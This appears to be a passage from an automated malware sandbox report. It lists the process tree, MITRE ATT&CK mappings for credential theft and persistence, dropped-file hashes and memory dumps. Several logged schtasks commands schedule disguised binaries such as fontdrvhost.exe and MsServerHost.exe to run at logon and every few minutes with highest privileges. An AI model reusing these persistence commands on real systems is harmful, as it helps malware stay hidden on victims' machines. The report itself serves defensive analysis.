C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc
1⤵
- Modifies data under HKEY_USERS
PID:4040

C:\Windows\system32\SppExtComObj.exe
C:\Windows\system32\SppExtComObj.exe -Embedding
1⤵
PID:3980

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
1⤵
PID:2916

C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
1⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:4184

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
1⤵
PID:3220

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s NgcCtnrSvc
1⤵
PID:952

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:4608

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:452

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:2012

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "winlogonw" /sc MINUTE /mo 7 /tr "'C:\Users\Public\winlogon.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2912

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "winlogon" /sc ONLOGON /tr "'C:\Users\Public\winlogon.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3448

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "winlogonw" /sc MINUTE /mo 6 /tr "'C:\Users\Public\winlogon.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4340

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "fontdrvhostf" /sc MINUTE /mo 10 /tr "'C:\Program Files (x86)\Reference Assemblies\Microsoft\fontdrvhost.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1172

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "fontdrvhost" /sc ONLOGON /tr "'C:\Program Files (x86)\Reference Assemblies\Microsoft\fontdrvhost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2188

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "fontdrvhostf" /sc MINUTE /mo 14 /tr "'C:\Program Files (x86)\Reference Assemblies\Microsoft\fontdrvhost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2372

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 6 /tr "'C:\Program Files (x86)\Windows Multimedia Platform\dllhost.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:5052

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dllhost" /sc ONLOGON /tr "'C:\Program Files (x86)\Windows Multimedia Platform\dllhost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:556

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 7 /tr "'C:\Program Files (x86)\Windows Multimedia Platform\dllhost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1944

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "MsServerHostM" /sc MINUTE /mo 13 /tr "'C:\Recovery\WindowsRE\MsServerHost.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3968

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "MsServerHost" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\MsServerHost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2252

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "MsServerHostM" /sc MINUTE /mo 6 /tr "'C:\Recovery\WindowsRE\MsServerHost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2660

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "fontdrvhostf" /sc MINUTE /mo 12 /tr "'C:\Program Files\Crashpad\reports\fontdrvhost.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4056

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "fontdrvhost" /sc ONLOGON /tr "'C:\Program Files\Crashpad\reports\fontdrvhost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4968

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "fontdrvhostf" /sc MINUTE /mo 11 /tr "'C:\Program Files\Crashpad\reports\fontdrvhost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3284

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "MsServerHostM" /sc MINUTE /mo 6 /tr "'C:\fontwin\MsServerHost.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1108

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "MsServerHost" /sc ONLOGON /tr "'C:\fontwin\MsServerHost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1232

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "MsServerHostM" /sc MINUTE /mo 12 /tr "'C:\fontwin\MsServerHost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4872

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

System Services

T1569

Service Execution

T1569.002

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Winlogon Helper DLL

T1547.004

Create or Modify System Process

T1543

Windows Service

T1543.003

Power Settings

T1653

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Winlogon Helper DLL

T1547.004

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

Impair Defenses

T1562

Modify Registry

T1112

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
d85ba6ff808d9e5444a4b369f5bc2730

SHA1
31aa9d96590fff6981b315e0b391b575e4c0804a

SHA256
84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

SHA512
8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
6d42b6da621e8df5674e26b799c8e2aa

SHA1
ab3ce1327ea1eeedb987ec823d5e0cb146bafa48

SHA256
5ab6a1726f425c6d0158f55eb8d81754ddedd51e651aa0a899a29b7a58619c4c

SHA512
53faffbda8a835bc1143e894c118c15901a5fd09cfc2224dd2f754c06dc794897315049a579b9a8382d4564f071576045aaaf824019b7139d939152dca38ce29

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
bd5940f08d0be56e65e5f2aaf47c538e

SHA1
d7e31b87866e5e383ab5499da64aba50f03e8443

SHA256
2d2f364c75bd2897504249f42cdf1d19374f5230aad68fa9154ea3d03e3031a6

SHA512
c34d10c7e07da44a180fae9889b61f08903aa84e8ddfa80c31c272b1ef9d491b8cec6b8a4c836c3cb1583fe8f4955c6a8db872515de3a9e10eae09610c959406

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
ecceac16628651c18879d836acfcb062

SHA1
420502b3e5220a01586c59504e94aa1ee11982c9

SHA256
58238de09a8817ed9f894ed8e5bf06a897fd08e0b0bd77e508d37b2598edd2a9

SHA512
be3c7cb529cafb00f58790a6f8b35c4ff6db9f7f43a507d2218fd80cebc88413e46f71b1bc35b8afcc36b68f9409c946470d1e74a4fe225400eeb6f3f898f5b3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
62623d22bd9e037191765d5083ce16a3

SHA1
4a07da6872672f715a4780513d95ed8ddeefd259

SHA256
95d79fd575bbd21540e378fcbc1cd00d16f51af62ce15bae7080bb72c24e2010

SHA512
9a448b7a0d867466c2ea04ab84d2a9485d5fd20ab53b2b854f491831ee3f1d781b94d2635f7b0b35cb9f2d373cd52c67570879a56a42ed66bc9db06962ed4992

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
d28a889fd956d5cb3accfbaf1143eb6f

SHA1
157ba54b365341f8ff06707d996b3635da8446f7

SHA256
21e5d7ccf80a293e6ba30ed728846ca19c929c52b96e2c8d34e27cd2234f1d45

SHA512
0b6d88deb9be85722e6a78d5886d49f2caf407a59e128d2b4ed74c1356f9928c40048a62731959f2460e9ff9d9feee311043d2a37abe3bb92c2b76a44281478c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
6d3e9c29fe44e90aae6ed30ccf799ca8

SHA1
c7974ef72264bbdf13a2793ccf1aed11bc565dce

SHA256
2360634e63e8f0b5748e2c56ebb8f4aa78e71008ea7b5c9ca1c49be03b49557d

SHA512
60c38c4367352537545d859f64b9c5cbada94240478d1d039fd27b5ecba4dc1c90051557c16d802269703b873546ead416279c0a80c6fd5e49ad361cef22596a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
e243a38635ff9a06c87c2a61a2200656

SHA1
ecd95ed5bf1a9fbe96a8448fc2814a0210fa2afc

SHA256
af5782703f3f2d5a29fb313dae6680a64134db26064d4a321a3f23b75f6ca00f

SHA512
4418957a1b10eee44cf270c81816ae707352411c4f5ac14b6b61ab537c91480e24e0a0a2c276a6291081b4984c123cf673a45dcedb0ceeef682054ba0fc19cb4

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
2e907f77659a6601fcc408274894da2e

SHA1
9f5b72abef1cd7145bf37547cdb1b9254b4efe9d

SHA256
385da35673330e21ac02545220552fe301fe54dedefbdafc097ac4342a295233

SHA512
34fa0fff24f6550f55f828541aaefe5d75c86f8f0842d54b50065e9746f9662bb7209c74c9a9571540b9855bb3851f01db613190024e89b198d485bb5dc07721

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
3a6bad9528f8e23fb5c77fbd81fa28e8

SHA1
f127317c3bc6407f536c0f0600dcbcf1aabfba36

SHA256
986366767de5873f1b170a63f2a33ce05132d1afd90c8f5017afbca8ef1beb05

SHA512
846002154a0ece6f3e9feda6f115d3161dc21b3789525dd62ae1d9188495171293efdbe7be4710666dd8a15e66b557315b5a02918a741ed1d5f3ff0c515b98e2

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
a8bd41695ca5d0d85f699a7f4a4c66db

SHA1
fd0078bb3c734354319481cfdafb3f6364a14311

SHA256
0874ed4b91f117451ed1b2fa1f1387152b2ecfed2121d2106c7071935338787a

SHA512
544b64648433fda811c00b6c47907b1cae4014e37b06f5ce6264f5dcdc7702694678746a2458b9d78c85ec1ade16304dc195e2d9672b84d7dfa7ac021e7c1f9c

Download Submit
C:\Users\Admin\AppData\Local\Temp\MpDefenderCoreService.exe

Filesize
1.8MB

MD5
8d9a9cff85c871e53cdfa82d0a46fc94

SHA1
f16d21268be5b0125f11157ff2d82612046010c5

SHA256
b4429685230b59b966c71b2b94097b993eabb84e0c4c3ca104af060bcc830bcb

SHA512
ca085ed7991a725ee94b144f329bb927cab2c4f6e5d8ece1725104da3d66fb183a387d2c3a15200e7218c64e0dd6cf195754bd8d011548581396e7747817e5fe

Download Submit
C:\Users\Admin\AppData\Local\Temp\RESD3A.tmp

Filesize
1KB

MD5
2fa358520b8095182c49a2c67d4e1c3d

SHA1
8939b078b9a36c94078b4969321758a4c3d24b92

SHA256
5d9129d2acc762104246f207a8338ee1f4f65ff1f903c490696cdcd816f2ef77

SHA512
626786afbf52e210ab0a502b2efa6a804c04bfa24c83e575c854baba649482cfbfc8210f86b9cdd36a0c6c22e936c81e9564ae662ae2526f0039ed8012c78277

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_tlgk10we.ka0.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\rqERLoI5WW.bat

Filesize
225B

MD5
c49e0a50c33ef7d1dec15e8933a47f38

SHA1
0deb394454c8c0d8ad82efdf2e96c30e888993f4

SHA256
4919ae51c9836f92d0e3a24f4eb7f4cdad2f6ae754f2b3e11491a353f0a6be27

SHA512
70a967d61bc4b68dc8de1102ecec60a2de53de3df11f2831a735f72986b92e3e70af0afe12aa526d32174b1c9c1cb39b23c1a30f17a644383d87cf3b7830fee8

Download Submit
C:\Users\Admin\AppData\Local\Temp\twain32.exe

Filesize
5.7MB

MD5
de40bff13376524593bbf365ac4489f2

SHA1
19178234bd0e35a984ff183418fc2f39c48b4e8d

SHA256
bafc17e2573f25344dbd7e27703f8e91b2abde15ac01a932bd3f12e686ab7952

SHA512
957fcc33adead5af1e5919251976c863b519f3097f21d1abf909cea136fe0b8ad7e8c15696a409d212d471c3b4d899cd021e7194fbcc4c6445b220383653016b

Download Submit
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
4KB

MD5
bdb25c22d14ec917e30faf353826c5de

SHA1
6c2feb9cea9237bc28842ebf2fea68b3bd7ad190

SHA256
e3274ce8296f2cd20e3189576fbadbfa0f1817cdf313487945c80e968589a495

SHA512
b5eddbfd4748298a302e2963cfd12d849130b6dcb8f0f85a2a623caed0ff9bd88f4ec726f646dbebfca4964adc35f882ec205113920cb546cc08193739d6728c

Download Submit
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
b42c70c1dbf0d1d477ec86902db9e986

SHA1
1d1c0a670748b3d10bee8272e5d67a4fabefd31f

SHA256
8ed3b348989cdc967d1fc0e887b2a2f5a656680d8d14ebd3cb71a10c2f55867a

SHA512
57fb278a8b2e83d01fac2a031c90e0e2bd5e4c1a360cfa4308490eb07e1b9d265b1f28399d0f10b141a6438ba92dd5f9ce4f18530ec277fece0eb7678041cbc5

Download Submit
C:\fontwin\MsServerHost.exe

Filesize
1.9MB

MD5
c23ec3a6c041cb8b7d626faee44ef7d8

SHA1
95739b177a47a9b0347591994f461d44db403649

SHA256
f791649ac2127072a37c5c1697ab9b304c15ad0aad93a6daecccaf5e442a051e

SHA512
89e420c422278a393102a27b51dfc56ef289aeb0d627db93bd4247ea796b7f83cfbfd327ddc6efaa913450970ab075c9dd3128159949713e10fce2cd178b8087

Download Submit
C:\fontwin\eUNvwPScHJBqRVxJMAbWN67h5pJ3FqxG.bat

Filesize
74B

MD5
3949760e5406001b774a6b5349902977

SHA1
187aacbf7de65a5716065184c9a0290cd533ff82

SHA256
a3f206b3f2588d0bd3aa95e46209fac7895b5dd955b3bbd8eec63f3f0a37c1d2

SHA512
694fc9fe0dd428b6d7e8f6805df29e09b85cee309a8c5e7560c4b9b3fd36d6547083c33d0073bbaad896b2b43ee13f7df0ec29309b196027ecb57710b9bf8cff

Download Submit
C:\fontwin\n5YK.vbe

Filesize
218B

MD5
7e7c767f1e75be51878d3e99bd17eb60

SHA1
e2f48d427ab85782feac5119447d0199a7d302fd

SHA256
842bcb05a80577f1a81bc2c58f25311ce81487e78855438bd9bd565f79318c5d

SHA512
2ab9cb47423608f5fea2189fde78500345e689f06bb65f4dace8108372091bc0cfe76b8ae52cbae86185fcc13a826fab07e09e8ac4126d0d800627f8cd9d0694

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\lkndfk0d\lkndfk0d.0.cs

Filesize
360B

MD5
8c193ca04be43a8769d8e30ab27b2cb0

SHA1
3fcae430284192e1b4fb9e17ebc424c7ea8c0709

SHA256
2dd5dda0eaede6fce7dac965b5444bb274d969bb968741f46c1c5df2b539cc24

SHA512
39a3e74a781450cb5e2d41b81c75be3c731b8251e363c97e29828cf2565ce0d58fda5ada1c7817d60b1f7a729268e5f222375f9c3563d58a54ddbeddfaadfc2b

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\lkndfk0d\lkndfk0d.cmdline

Filesize
235B

MD5
41c5a8423abc9874db1b3262910c129f

SHA1
5e6650b36a178114add309508cd1e7fc49abb7d6

SHA256
b3d18cf1d44a0f4a34b7a7862c521987a5fe64c884e5367268372eb6931ba0be

SHA512
fa02b498fdc1b946cd19119a21dbb88ad4bcbbfa224ae3ffcb8dfb27a5db97ecbe40f866de5c2faeeedda76c6a5ce8cf5f77d82ba83c639ce0bab1454be5b74a

Download Submit
\??\c:\Windows\System32\CSC5E2D5D3AA49F40418C336E32307AFD6A.TMP

Filesize
1KB

MD5
82a7b8ef3bc275711e3b27c6df93c7ff

SHA1
bdac909f26475c94c74145576bcf22adb0f8203c

SHA256
582921e5e6617cb736006c46c9c8576d8fdefb8763469bdbf305d52d298f6124

SHA512
f2100bca60280f6ad93f40254d6fe69bd9917a44973516874aa54c28042796503daac5c51869924f5ecd17615f461dda6441f479e1201c44ad07f5a7728af248

Download Submit
memory/316-64-0x000001B986840000-0x000001B986867000-memory.dmp

Filesize
156KB

Download
memory/316-65-0x00007FF9E61D0000-0x00007FF9E61E0000-memory.dmp

Filesize
64KB

Download
memory/412-71-0x0000029CF0B70000-0x0000029CF0B97000-memory.dmp

Filesize
156KB

Download
memory/412-72-0x00007FF9E61D0000-0x00007FF9E61E0000-memory.dmp

Filesize
64KB

Download
memory/612-54-0x000001EE6A7B0000-0x000001EE6A7D1000-memory.dmp

Filesize
132KB

Download
memory/612-58-0x00007FF9E61D0000-0x00007FF9E61E0000-memory.dmp

Filesize
64KB

Download
memory/612-56-0x000001EE6A930000-0x000001EE6A957000-memory.dmp

Filesize
156KB

Download
memory/684-60-0x00007FF9E61D0000-0x00007FF9E61E0000-memory.dmp

Filesize
64KB

Download
memory/684-57-0x000001E89D7D0000-0x000001E89D7F7000-memory.dmp

Filesize
156KB

Download
memory/960-68-0x00007FF9E61D0000-0x00007FF9E61E0000-memory.dmp

Filesize
64KB

Download
memory/960-67-0x0000023DF7440000-0x0000023DF7467000-memory.dmp

Filesize
156KB

Download
memory/1056-80-0x00007FF9E61D0000-0x00007FF9E61E0000-memory.dmp

Filesize
64KB

Download
memory/1056-79-0x00000221FB1B0000-0x00000221FB1D7000-memory.dmp

Filesize
156KB

Download
memory/1064-82-0x0000018C0D060000-0x0000018C0D087000-memory.dmp

Filesize
156KB

Download
memory/1064-83-0x00007FF9E61D0000-0x00007FF9E61E0000-memory.dmp

Filesize
64KB

Download
memory/1080-85-0x0000016EBCAD0000-0x0000016EBCAF7000-memory.dmp

Filesize
156KB

Download
memory/1080-86-0x00007FF9E61D0000-0x00007FF9E61E0000-memory.dmp

Filesize
64KB

Download
memory/1192-89-0x00007FF9E61D0000-0x00007FF9E61E0000-memory.dmp

Filesize
64KB

Download
memory/1192-88-0x000002DB21960000-0x000002DB21987000-memory.dmp

Filesize
156KB

Download
memory/1208-92-0x00007FF9E61D0000-0x00007FF9E61E0000-memory.dmp

Filesize
64KB

Download
memory/1208-91-0x000001E55FD70000-0x000001E55FD97000-memory.dmp

Filesize
156KB

Download
memory/1292-97-0x00007FF9E61D0000-0x00007FF9E61E0000-memory.dmp

Filesize
64KB

Download
memory/1292-96-0x0000016837590000-0x00000168375B7000-memory.dmp

Filesize
156KB

Download
memory/1312-99-0x000001D44FC90000-0x000001D44FCB7000-memory.dmp

Filesize
156KB

Download
memory/1312-100-0x00007FF9E61D0000-0x00007FF9E61E0000-memory.dmp

Filesize
64KB

Download
memory/1592-1206-0x00000000003F0000-0x00000000005E8000-memory.dmp

Filesize
2.0MB

Download
memory/2652-42-0x00007FFA25250000-0x00007FFA2530E000-memory.dmp

Filesize
760KB

Download
memory/2652-41-0x00007FFA26150000-0x00007FFA26345000-memory.dmp

Filesize
2.0MB

Download
memory/2888-622-0x0000000002990000-0x00000000029A8000-memory.dmp

Filesize
96KB

Download
memory/2888-626-0x00000000006F0000-0x00000000006FC000-memory.dmp

Filesize
48KB

Download
memory/2888-628-0x0000000000980000-0x000000000098E000-memory.dmp

Filesize
56KB

Download
memory/2888-630-0x0000000000C20000-0x0000000000C2C000-memory.dmp

Filesize
48KB

Download
memory/2888-624-0x00000000006E0000-0x00000000006EE000-memory.dmp

Filesize
56KB

Download
memory/2888-620-0x000000001AFA0000-0x000000001AFF0000-memory.dmp

Filesize
320KB

Download
memory/2888-619-0x0000000002970000-0x000000000298C000-memory.dmp

Filesize
112KB

Download
memory/2888-617-0x00000000006D0000-0x00000000006DE000-memory.dmp

Filesize
56KB

Download
memory/2888-615-0x0000000000060000-0x0000000000258000-memory.dmp

Filesize
2.0MB

Download
memory/4564-367-0x0000029AFB440000-0x0000029AFB44A000-memory.dmp

Filesize
40KB

Download
memory/4564-366-0x0000029AFB430000-0x0000029AFB436000-memory.dmp

Filesize
24KB

Download
memory/4564-365-0x0000029AFB400000-0x0000029AFB408000-memory.dmp

Filesize
32KB

Download
memory/4564-364-0x0000029AFB450000-0x0000029AFB46A000-memory.dmp

Filesize
104KB

Download
memory/4564-363-0x0000029AFB3F0000-0x0000029AFB3FA000-memory.dmp

Filesize
40KB

Download
memory/4564-362-0x0000029AFB410000-0x0000029AFB42C000-memory.dmp

Filesize
112KB

Download
memory/4564-361-0x0000029AFB2A0000-0x0000029AFB2AA000-memory.dmp

Filesize
40KB

Download
memory/4564-360-0x0000029AFB1E0000-0x0000029AFB295000-memory.dmp

Filesize
724KB

Download
memory/4564-359-0x0000029AFB1C0000-0x0000029AFB1DC000-memory.dmp

Filesize
112KB

Download
memory/4700-30-0x000001AE508C0000-0x000001AE508E2000-memory.dmp

Filesize
136KB

Download